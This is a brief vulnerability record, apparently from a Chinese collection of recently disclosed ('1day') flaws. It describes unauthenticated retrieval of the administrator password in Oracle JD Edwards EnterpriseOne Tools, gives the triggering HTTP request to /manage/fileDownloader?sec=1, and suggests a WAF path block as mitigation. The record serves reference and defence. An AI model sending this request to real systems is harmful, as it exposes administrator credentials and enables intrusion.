vendor = "Oracle"
name = "Oracle JD Edwards EnterpriseOne Tools 未授权获取管理员密码漏洞"
type = "未授权访问"
version = "未知"
path = "/manage/fileDownloader"
detail = "GET /manage/fileDownloader?sec=1 HTTP/1.1 Host:"
fix = "WAF封禁路路径，等待发布补丁"
date = "0823"
label = "1day"
